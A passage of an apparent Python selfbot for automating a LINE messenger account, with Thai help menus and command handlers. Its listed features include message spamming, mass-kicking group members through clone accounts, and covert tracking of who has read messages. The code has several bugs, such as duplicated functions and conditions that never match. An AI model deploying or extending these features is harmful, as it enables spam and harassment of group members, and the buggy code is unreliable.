lineMID = line.profile.mid
lineProfile = line.getProfile()
lineSettings = line.getSettings()
# kiMID = ki.profile.mid
# kiProfile = ki.getProfile()
# kiSettings = ki.getSettings()
# kkMID = kk.profile.mid
# kkProfile = kk.getProfile()
# kkSettings = kk.getSettings()
# kcMID = kc.profile.mid
# kcProfile = kc.getProfile()
# kcSettings = kc.getSettings()
# keMID = kc.profile.mid
# keProfile = kc.getProfile()
# keSettings = kc.getSettings()
# oepoll = OEPoll(ke)
# oepoll = OEPoll(kc)
# oepoll = OEPoll(kk)
# oepoll = OEPoll(ki)
oepoll = OEPoll(line)
readOpen = codecs.open("read.json","r","utf-8")
settingsOpen = codecs.open("temp.json","r","utf-8")
read = json.load(readOpen)
settings = json.load(settingsOpen)
Rfu = [line]
lineMID = line.getProfile().mid
# kiMID = ki.getProfile().mid
# kkMID = kk.getProfile().mid
# kcMID = kc.getProfile().mid
# kcMID = ke.getProfile().mid
# bot1 = line.getProfile().mid
RfuBot=[lineMID]
Family=["u8868612505a8f0a0a702291b756a45f3",lineMID]
admin=['u8868612505a8f0a0a702291b756a45f3',lineMID]
RfuFamily = RfuBot + Family
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
#==============================================================================#
settings = {
"autoAdd": True,
"autoJoin": False,
'autoCancel':{"on":True,"members":5},
"autoLeave": False,
"autoRead": False,
"leaveRoom": False,
"detectMention": False,
"checkSticker": False,
"kickMention": False,
"potoMention": True,
"lang":"JP",
"Sd": True,
"Nn": True,
"blacklist":{},
"winvite": False,
"wblacklist": False,
"dblacklist": False,
"commentBlack":{},
"wblack": False,
"dblack": False,
"clock": False,
"cName":"",
"cNames":"",
"welcome":"ตั้งข้อความคนเข้าด้วยนะครับ",
"bye":"ตั้งข้อความคนออกด้วยนะครับ",
"invite": {},
"winvite": False,
"pnharfbot": {},
"pname": {},
"pro_name": {},
"message":"Thanks for add me Selfbot By Sai",
"comment":"Thanks for add me Selfbot By Sai",
"Respontag":"ตั้งข้อความแท็กของคุณ",
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
],
"mimic": {
"copy": False,
"status": False,
"target": {}
}
}
RfuProtect = {
"protect": False,
"cancelprotect": False,
"inviteprotect": False,
"linkprotect": False,
"Protectguest": False,
"Protectjoin": False,
"autoAdd": False,
}
Setmain = {
"foto": {},
}
read = {
"readPoint": {},
"readMember": {},
"readTime": {},
"ROM": {}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
mimic = {
"copy":True,
"copy2":True,
"status":False,
"target":{}
}
RfuCctv={
"cyduk":{},
"point":{},
"sidermem":{}
}
rfuSet = {
'setTime':{},
'ricoinvite':{},
}
setTime = {}
setTime = rfuSet['setTime']
contact = line.getProfile()
backup = line.getProfile()
backup.dispalyName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
mulai = time.time()
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
#==============================================================================#
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMessageWithMention(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@x '
line.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╔══[จำนวนคนที่แท็ก {} คน]\n╠ ".format(str(len(mid)))
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "╠ "
else:
try:
textx += "╚══[ชื่อกลุ่ม {} ]".format(str(line.getGroup(to).name))
except:
pass
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def backupData():
try:
backup = settings
f = codecs.open('temp.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
backup = read
f = codecs.open('read.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
return True
except Exception as error:
logError(error)
return False
#==============================================================================#
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("TAG ALL")
try:
line.sendMessage(msg)
except Exception as error:
print(error)
def restartBot():
print ("RESTART SERVER")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log(" Sai " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessageWithMention(to, lineMID):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(lineMID)+'}'
text_ = '@x '
line.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def myhelp():
myHelp = " 【คำสั่ง ➾ เรียกดูคำสั่ง】"+ " \n" + \
" 【คำสั่งแปล ➾ เรียกดูคำสั่งแปล】"+ " \n" + \
" 【รีบูส ➾ รูบูสระบบ】"+ " \n" + \
" 【เช็คออน์ ➾ เช็คเวลาทำงานบอท】"+ " \n" + \
" 【ไลน์ ➾ เช็คข้อมูลไลน์】"+ " \n" + \
" 【เช็คตั้งค่า ➾ เช็คระบบตั้งค่า】"+ " \n" + \
" 【ไอดี ➾ ดูmid】"+ " \n" + \
" 【ชื่อ ➾ ดูชื่อไลน์】"+ " \n" + \
" 【รูป ➾ ดึงรูป】"+ " \n" + \
" 【รูปวิดีโอ ➾ ดึงวิดีโอ】"+ " \n" + \
" 【รูปปก ➾ ดึงปก】"+ " \n" + \
" 【คท @ ➾ ดึงคอนแทค】"+ " \n" + \
" 【ชื่อ @ ➾ ดึงชื่อ】"+ " \n" + \
" 【ตัส @ ➾ ดึงตัส】"+ " \n" + \
" 【รูป @ ➾ ดึงรูป】"+ " \n" + \
" 【รูปวิดีโอ @ ➾ ดึงรูปวิดีโอ】"+ " \n" + \
" 【ปก @ ➾ ดึงปก】"+ " \n" + \
" 【คืนร่าง ➾ กลับร่างเดิม】"+ " \n" + \
" 【เลียนแบบ @ ➾ เพิ่มพูดตาม】"+ " \n" + \
" 【เลียนแบบลบ @ ➾ ลบพูดตาม】"+ " \n" + \
" 【เช็คเลียนแบบ ➾ เช็คชื่อพูดตาม】"+ " \n" + \
" 【เช็คแอด ➾ เช็คแอดห้อง】"+ " \n" + \
" 【ไอดีกลุ่ม ➾ GID กลุ่ม】"+ " \n" + \
" 【รูปกลุ่ม ➾ ดึงรูปห้อง"+ " \n" + \
" 【ชื่อกลุ่ม ➾ ดึงชื่อห้อง】"+ " \n" + \
" 【ขอลิ้งค์ ➾ เอาลิ้งค์ห้อง】"+ " \n" + \
" 【เปิดลิ้งค์ ➾ เปิดลิ้งค์ห้อง】"+ " \n" + \
" 【ปิดลิ้งค์ ➾ ปิดลิ้งค์ห้อง】"+ " \n" + \
" 【ข้อมูลกลุ่ม ➾ เช็ครายละเอียดห้อง】"+ " \n" + \
" 【สมาชิก ➾ ชื่อสมาชิก】"+ " \n" + \
" 【กลุ่ม ➾ เช็ครายชื่อกลุ่ม】"+ " \n" + \
" 【1กลุ่ม ➾ คลิ้ก1 เช็ครายชื่อกลุ่ม】"+ " \n" + \
" 【2กลุ่ม ➾ คลิ้ก2 เช็ครายชื่อกลุ่ม】"+ " \n" + \
" 【3กลุ่ม ➾ คลิ้ก3 เช็ครายชื่อกลุ่ม】"+ " \n" + \
" 【แท็ก ➾ สั่งแท็คคนทั้งหมด】"+ " \n" + \
" 【เช็คอ่าน ➾ เปิดระบบอ่าน】"+ " \n" + \
" 【อ่าน ➾ ดูรายชื่อคนอ่าน】"+ " \n" + \
" 【ค้นหารูป ➾ ค้นหารูปจากgoogle】"+ " \n" + \
" 【ค้นหาอินสตาแกรม ➾ หาอินสตาแกรม】"+ " \n" + \
" 【รูปการตูน ➾ ค้นหารูปจากgoogle】"+ " \n" + \
" 【ค้นหายูทูป ➾ ค้นหายูทูป】"+ " \n" + \
" 【รายการเพื่อน ➾ เช็ครายชื่อเพื่อนเรา】"+ " \n" + \
" 【รายการบล็อค ➾ รายการกดบล็อค】"+ " \n" + \
" 【รายการmid ➾ รายการmidเพื่อนทั้งหมด】"+ " \n" + \
" 【เชิญกุ ➾ เชิญคนเขียนบอท】"+ " \n" + \
" 【ออก ➾ สั่งตัวเองออกจากห้อง】"+ " \n" + \
" 【ออก1 ➾ สั่งคลิ้กออก】"+ " \n" + \
" 【ลบรัน ➾ ลบห้องรัน】"+ " \n" + \
" 【เชิญ ➾ เชิญด้วยคท】"+ " \n" + \
" 【เตะ @ ➾ ลบคน】"+ " \n" + \
" 【เชิญ @ ➾ เชิญคน】"+ " \n" + \
" 【1เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
" 【2เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
" 【3เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
" 【เตะดำ ➾ เตะรายการบชดำ】"+ " \n" + \
" 【ลบแชท ➾ สั่งลบแชททั้งหมด】"+ " \n" + \
" 【ออกแชทรวม ➾ ออกจากแชทรวมออโต้】"+ " \n" + \
" 【อัพตัส: ➾ เปลี่ยนตัสเรา】"+ " \n" + \
" 【อัพชื่อ: ➾ เปลี่ยนชื่อเรา】"+ " \n" + \
" 【ชื่อคลิ้ก ➾ เปลี่ยนชื่อคลิ้ก】"+ " \n" + \
" 【ตัสคลิ้ก ➾ เปลี่ยนตัส】"+ " \n" + \
" 【1ลบรัน ➾ ลบรัน】"+ " \n" + \
" 【เช็คดำ ➾ เช็ครายการดำ】"+ " \n" + \
" 【บล็อคเปิด ➾ ออโต้บล้อคเปิด】"+ " \n" + \
" 【บล็อคปิด ➾ ออโต้บล็อคปิด】"+ " \n" + \
" 【เข้าเปิด ➾ เข้าห้องออโต้เปิด】"+ " \n" + \
" 【เข้าปิด ➾ เข้าห้องออโต้ปิด】"+ " \n" + \
" 【แชทรวมเปิด ➾ กันดึงแชทรวมเปิด】"+ " \n" + \
" 【แชทรวมปิด ➾ กันดึงแชทรวมปิด】"+ " \n" + \
" 【อ่านเปิด ➾ เปิดระบบอ่าน】"+ " \n" + \
" 【อ่านปิด ➾ ปิดระบบอ่าน】"+ " \n" + \
" 【เช็คติ้กเปิด ➾ ระบบเช็คติ้กเปิด】"+ " \n" + \
" 【เช็คติ้กปิด ➾ ระบบเช็คติ้กปิด】"+ " \n" + \
" 【เปิดหมด ➾ เปิดระบบกันหมด】"+ " \n" + \
" 【ปิดหมด ➾ ปิดระบบกันหมด】"+ " \n" + \
" 【เปิดคนเข้า ➾ เปิดระบบต้อนรับ】"+ " \n" + \
" 【ปิดคนเข้า ➾ ปิดระบบต้อนรับ】"+ " \n" + \
" 【เปิดคนออก ➾ เปิดระบบต้อนรับ】"+ " \n" + \
" 【ปิดคนออก ➾ ปิดระบบต้อนรับ】"+ " \n" + \
" 【ทักออก: ➾ ตั้งข้อความทักคนเข้า】"+ " \n" + \
" 【ทักเข้า: ➾ ตั้งข้อความทักคนออก】"+ " \n" + \
" 【ตั้งแท็ก: ➾ ตั้งข้อความทักคนแท็ก】"+ " \n" + \
" 【ลบเชิญs ➾ ลบค้างเชิญ】"+ " \n" + \
" 【เช็ค ➾ตรวจจับคนอ่าน 】"+ " \n" + \
" 【อ่าน ➾รายชื่อคนอ่าน】"+ " \n" + \
" 【urban ➾ขาว 】"+ " \n" + \
" 【Gcancel: on ➾ เปิดระบบยกเลิกห้อง】"+ " \n" + \
" 【Gcancel: off ➾ ปิดระบบยกเลิกห้อง】"+ " \n" + \
" 【Copy @ ➾ คัดลอกคนอื่น】"+ " \n" + \
" 【me ➾ คทเรา】"+ " \n" + \
" 【ME ➾ คทเรา】"+ " \n" + \
" 【Me ➾ คทเรา】"+ " \n" + \
" 【zt ➾ ดูคนไส่ล่องหน】"+ " \n" + \
" 【zm ➾ ดูคนไส่ล่องหน】"+ " \n" + \
" 【zc ➾ ดูคนไส่ล่องหน】"+ " \n" + \
" 【Allban ➾ แบนหมด】"+ " \n" + \
" 【ban @ ➾ บชดำ】"+ " \n" + \
" 【unban @ ➾ บชขาว】"+ " \n" + \
" 【video @ ➾ ดึงรูปวิดีโอ】"+ " \n" + \
" 【mimic on ➾ เปิดระบบพูดตาม】"+ " \n" + \
" 【mimic off ➾ ปิดระบบพูดตาม】"+ " \n" + \
" 【Bcvoice +ข้อความ ➾ ดึงmid】"+ " \n" + \
" 【Cbcvoice ➾ ส่งmp3ทุกห้อง】"+ " \n" + \
" 【Dow +ข้อความ ➾ เปลี่ยนไอดีไลน์】"+ " \n" + \
" 【Day ➾ เช็ควันและเดือน】"+ " \n" + \
" 【Spam on +เลข+ข้อความ】 ➾ "+ " \n" + \
" 【cb ➾ ล้างบชดำ】"+ " \n" + \
" 【Sai ➾ สั่งคลิ้กเข้า】"+ " \n" + \
" 【1-3 @ ➾ สั่งคลิ้กเตะ】"+ " \n" + \
" 【Cleanse ➾ สั่งคลิ้กบิน】"+ " \n" + \
" 【protect on ➾ เปิดป้องกัน】"+ " \n" + \
" 【protect off ➾ ปิดป้องกัน】"+ " \n" + \
" 【cancel on ➾ เปิดยกเลิกป้องกัน】"+ " \n" + \
" 【cancel off ➾ ปิดยกเลิกป้องกัน】"+ " \n" + \
" 【invit on ➾ เปิดเชิญป้องกัน】"+ " \n" + \
" 【invit off ➾ ปิดเชิญป้องกัน】"+ " \n" + \
" 【link on ➾ เปิดป้องกันลิ้งค์】"+ " \n" + \
" 【link off ➾ ปิดป้องกันลิ้งค์】"+ " \n" + \
" 【guest on ➾ เปิดป้องกันสมาชิก】"+ " \n" + \
" 【guest off ➾ ปิดป้องกันสมาชิก】"+ " \n" + \
" 【join on ➾ เปิดป้องกันคนเข้า】"+ " \n" + \
" 【join off ➾ ปิดป้องกันคนเข้า】"+ " \n" + \
"⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
return myHelp
def helptexttospeech():
helpTextToSpeech = "╔══════════════┓" + "\n" + \
"╠ af : Afrikaans" + "\n" + \
"╠ sq : Albanian" + "\n" + \
"╠ ar : Arabic" + "\n" + \
"╠ hy : Armenian" + "\n" + \
"╠ bn : Bengali" + "\n" + \
"╠ ca : Catalan" + "\n" + \
"╠ zh : Chinese" + "\n" + \
"╠ zh-cn : Chinese (Mandarin/China)" + "\n" + \
"╠ zh-tw : Chinese (Mandarin/Taiwan)" + "\n" + \
"╠ zh-yue : Chinese (Cantonese)" + "\n" + \
"╠ hr : Croatian" + "\n" + \
"╠ cs : Czech" + "\n" + \
"╠ da : Danish" + "\n" + \
"╠ nl : Dutch" + "\n" + \
"╠ en : English" + "\n" + \
"╠ en-au : English (Australia)" + "\n" + \
"╠ en-uk : English (United Kingdom)" + "\n" + \
"╠ en-us : English (United States)" + "\n" + \
"╠ eo : Esperanto" + "\n" + \
"╠ fi : Finnish" + "\n" + \
"╠ fr : French" + "\n" + \
"╠ de : German" + "\n" + \
"╠ el : Greek" + "\n" + \
"╠ hi : Hindi" + "\n" + \
"╠ hu : Hungarian" + "\n" + \
"╠ is : Icelandic" + "\n" + \
"╠ id : Indonesian" + "\n" + \
"╠ it : Italian" + "\n" + \
"╠ ja : Japanese" + "\n" + \
"╠ km : Khmer (Cambodian)" + "\n" + \
"╠ ko : Korean" + "\n" + \
"╠ la : Latin" + "\n" + \
"╠ lv : Latvian" + "\n" + \
"╠ mk : Macedonian" + "\n" + \
"╠ no : Norwegian" + "\n" + \
"╠ pl : Polish" + "\n" + \
"╠ pt : Portuguese" + "\n" + \
"╠ ro : Romanian" + "\n" + \
"╠ ru : Russian" + "\n" + \
"╠ sr : Serbian" + "\n" + \
"╠ si : Sinhala" + "\n" + \
"╠ sk : Slovak" + "\n" + \
"╠ es : Spanish" + "\n" + \
"╠ es-es : Spanish (Spain)" + "\n" + \
"╠ es-us : Spanish (United States)" + "\n" + \
"╠ sw : Swahili" + "\n" + \
"╠ sv : Swedish" + "\n" + \
"╠ ta : Tamil" + "\n" + \
"╠ th : Thai" + "\n" + \
"╠ tr : Turkish" + "\n" + \
"╠ uk : Ukrainian" + "\n" + \
"╠ vi : Vietnamese" + "\n" + \
"╠ cy : Welsh" + "\n" + \
"╚══════════════┛" + "\n" + "\n\n" + \
""
return helpTextToSpeech
def helplanguange():
helpLanguange = "╔══════════════┓" + "\n" + \
"╠ af : afrikaans" + "\n" + \
"╠ sq : albanian" + "\n" + \
"╠ am : amharic" + "\n" + \
"╠ ar : arabic" + "\n" + \
"╠ hy : armenian" + "\n" + \
"╠ az : azerbaijani" + "\n" + \
"╠ eu : basque" + "\n" + \
"╠ be : belarusian" + "\n" + \
"╠ bn : bengali" + "\n" + \
"╠ bs : bosnian" + "\n" + \
"╠ bg : bulgarian" + "\n" + \
"╠ ca : catalan" + "\n" + \
"╠ ceb : cebuano" + "\n" + \
"╠ ny : chichewa" + "\n" + \
"╠ zh-cn : chinese (simplified)" + "\n" + \
"╠ zh-tw : chinese (traditional)" + "\n" + \
"╠ co : corsican" + "\n" + \
"╠ hr : croatian" + "\n" + \
"╠ cs : czech" + "\n" + \
"╠ da : danish" + "\n" + \
"╠ nl : dutch" + "\n" + \
"╠ en : english" + "\n" + \
"╠ eo : esperanto" + "\n" + \
"╠ et : estonian" + "\n" + \
"╠ tl : filipino" + "\n" + \
"╠ fi : finnish" + "\n" + \
"╠ fr : french" + "\n" + \
"╠ fy : frisian" + "\n" + \
"╠ gl : galician" + "\n" + \
"╠ ka : georgian" + "\n" + \
"╠ de : german" + "\n" + \
"╠ el : greek" + "\n" + \
"╠ gu : gujarati" + "\n" + \
"╠ ht : haitian creole" + "\n" + \
"╠ ha : hausa" + "\n" + \
"╠ haw : hawaiian" + "\n" + \
"╠ iw : hebrew" + "\n" + \
"╠ hi : hindi" + "\n" + \
"╠ hmn : hmong" + "\n" + \
"╠ hu : hungarian" + "\n" + \
"╠ is : icelandic" + "\n" + \
"╠ ig : igbo" + "\n" + \
"╠ id : indonesian" + "\n" + \
"╠ ga : irish" + "\n" + \
"╠ it : italian" + "\n" + \
"╠ ja : japanese" + "\n" + \
"╠ jw : javanese" + "\n" + \
"╠ kn : kannada" + "\n" + \
"╠ kk : kazakh" + "\n" + \
"╠ km : khmer" + "\n" + \
"╠ ko : korean" + "\n" + \
"╠ ku : kurdish (kurmanji)" + "\n" + \
"╠ ky : kyrgyz" + "\n" + \
"╠ lo : lao" + "\n" + \
"╠ la : latin" + "\n" + \
"╠ lv : latvian" + "\n" + \
"╠ lt : lithuanian" + "\n" + \
"╠ lb : luxembourgish" + "\n" + \
"╠ mk : macedonian" + "\n" + \
"╠ mg : malagasy" + "\n" + \
"╠ ms : malay" + "\n" + \
"╠ ml : malayalam" + "\n" + \
"╠ mt : maltese" + "\n" + \
"╠ mi : maori" + "\n" + \
"╠ mr : marathi" + "\n" + \
"╠ mn : mongolian" + "\n" + \
"╠ my : myanmar (burmese)" + "\n" + \
"╠ ne : nepali" + "\n" + \
"╠ no : norwegian" + "\n" + \
"╠ ps : pashto" + "\n" + \
"╠ fa : persian" + "\n" + \
"╠ pl : polish" + "\n" + \
"╠ pt : portuguese" + "\n" + \
"╠ pa : punjabi" + "\n" + \
"╠ ro : romanian" + "\n" + \
"╠ ru : russian" + "\n" + \
"╠ sm : samoan" + "\n" + \
"╠ gd : scots gaelic" + "\n" + \
"╠ sr : serbian" + "\n" + \
"╠ st : sesotho" + "\n" + \
"╠ sn : shona" + "\n" + \
"╠ sd : sindhi" + "\n" + \
"╠ si : sinhala" + "\n" + \
"╠ sk : slovak" + "\n" + \
"╠ sl : slovenian" + "\n" + \
"╠ so : somali" + "\n" + \
"╠ es : spanish" + "\n" + \
"╠ su : sundanese" + "\n" + \
"╠ sw : swahili" + "\n" + \
"╠ sv : swedish" + "\n" + \
"╠ tg : tajik" + "\n" + \
"╠ ta : tamil" + "\n" + \
"╠ te : telugu" + "\n" + \
"╠ th : thai" + "\n" + \
"╠ tr : turkish" + "\n" + \
"╠ uk : ukrainian" + "\n" + \
"╠ ur : urdu" + "\n" + \
"╠ uz : uzbek" + "\n" + \
"╠ vi : vietnamese" + "\n" + \
"╠ cy : welsh" + "\n" + \
"╠ xh : xhosa" + "\n" + \
"╠ yi : yiddish" + "\n" + \
"╠ yo : yoruba" + "\n" + \
"╠ zu : zulu" + "\n" + \
"╠ fil : Filipino" + "\n" + \
"╠ he : Hebrew" + "\n" + \
"╚══════════════┛" + "\n" + "\n\n" + \
"BY SAI"
return helpLanguange
#==============================================================================#
def lineBot(op):
try:
if op.type == 0:
return
if op.type == 5:
if settings["autoAdd"] == True:
line.blockContact(op.param1)
if op.type == 13:
if lineMID in op.param3:
G = line.getGroup(op.param1)
if settings["autoJoin"] == True:
if settings["autoCancel"]["on"] == True:
if len(G.members) <= settings["autoCancel"]["members"]:
line.rejectGroupInvitation(op.param1)
else:
line.acceptGroupInvitation(op.param1)
else:
line.acceptGroupInvitation(op.param1)
elif settings["autoCancel"]["on"] == True:
if len(G.members) <= settings["autoCancel"]["members"]:
line.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in settings["blacklist"]:
matched_list+=[str for str in InviterX if str == tag]
if matched_list == []:
pass
else:
line.cancelGroupInvitation(op.param1, matched_list)
if op.type == 25:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
if text.lower() == 'คำสั่ง':
myHelp = myhelp()
line.sendMessage(to, str(myHelp))
elif text.lower() == 'คำสั่ง2':
helpTextToSpeech = helptexttospeech()
line.sendMessage(to, str(helpTextToSpeech))
elif text.lower() == 'คำสั่ง3':
helpLanguange = helplanguange()
line.sendMessage(to, str(helpLanguange))
#==============================================================================#
elif text.lower() == 'Sp':
start = time.time()
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elapsed_time = time.time() - start
line.sendMessage(to,format(str(elapsed_time)))
elif text.lower() == 'sp':
start = time.time()
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elapsed_time = time.time() - start
line.sendMessage(to,format(str(elapsed_time)))
elif text.lower() == 'รีบูส':
line.sendMessage(to, "กรุณาล็อคอินลิ้งค์ใหม่.")
# line.sendMessage(to, "Success Restarting.")
restartBot()
elif text.lower() == 'เช็คออน์':
timeNow = time.time()
runtime = timeNow - botStart
runtime = format_timespan(runtime)
line.sendMessage(to, "เวลาการทำงานของบอท {}".format(str(runtime)))
elif text.lower() == 'ไลน์':
try:
arr = []
owner = "ubd78f3da598d3c32e075e062e88545ec"
creator = line.getContact(owner)
contact = line.getContact(lineMID)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\nชื่อ ไลน์คุณ ✈️ {}".format(contact.displayName)
ret_ += "\nรายการกลุ่ม ✈️ {}".format(str(len(grouplist)))
ret_ += "\nรายการเพื่อน ✈️ {}".format(str(len(contactlist)))
ret_ += "\nรายการบล็อค ✈️ {}".format(str(len(blockedlist)))
ret_ += "\nตัส ✈️ "
ret_ += "\nผู้เขียนบอท ✈️{}".format(creator.displayName)
line.sendContact(to, owner)
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
#==============================================================================#
elif text.lower() == 'เช็คตั้งค่า':
try:
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
if settings["autoJoin"] == True: ret_ += "\nเข้าห้องออโต้ ↹ เปิด "
else: ret_ += "\nเข้าห้องออโต้ ↹ ปิด"
if settings["detectMention"] == True: ret_ += "\nข้อความแท็ก ↹ เปิด"
else: ret_ += "\nข้อความแท็ก ↹ ปิด"
if settings["autoLeave"] == True: ret_ += "\ออกแชทรวมออโต้ ↹ เปิด"
else: ret_ += "\nออกแชทรวมออโต้ ↹ ปิด"
if RfuProtect["Protectjoin"] == True: ret_ += "\nป้องกันการเข้ารวม ↹ เปิด"
else: ret_ += "\nป้องกันการเข้ารวม ↹ ปิด"
if settings["autoRead"] == True: ret_ += "\nระบบอ่าน ↹ เปิด"
else: ret_ += "\nระบบอ่าน ↹ ปิด"
if settings["checkSticker"] == True: ret_ += "\nเช็คสติ้กเกอร์ ↹ เปิด"
else: ret_ += "\nเช็คสติ้กเกอร์ ↹ ปิด"
if RfuProtect["Protectguest"] == True: ret_ += "\nป้องกัน ↹ เปิด"
else: ret_ += "\nป้องกัน ↹ ปิด"
if RfuProtect["inviteprotect"] == True: ret_ += "\nป้องกันการเชิญ ↹ เปิด"
else: ret_ += "\nป้องกันการเชิญ ↹ ปิด"
if RfuProtect["cancelprotect"] == True: ret_ += "\nป้องกันการยกเลิก ↹ เปิด"
else: ret_ += "\nป้องกันการยกเลิก ↹ ปิด"
if RfuProtect["protect"] == True: ret_ += "\nป้องกันการลบ ↹ เปิด"
else: ret_ += "\nป้องกันการลบ ↹ เปิด"
if RfuProtect["linkprotect"] == True: ret_ += "\nป้องกัน QR ↹ เปิด"
else: ret_ += "\nป้องกัน QR ปิด"
if settings["autoCancel"]["on"] == True:ret_+="\nยกเลิกเชิญกลุ่มเมื่อมีสมาชิกต่ำกว่า " + str(settings["autoCancel"]["members"]) + "↹ เปิด"
else: ret_ += "\nยกเลิกเชิญกลุ่ม ↹ ปิด"
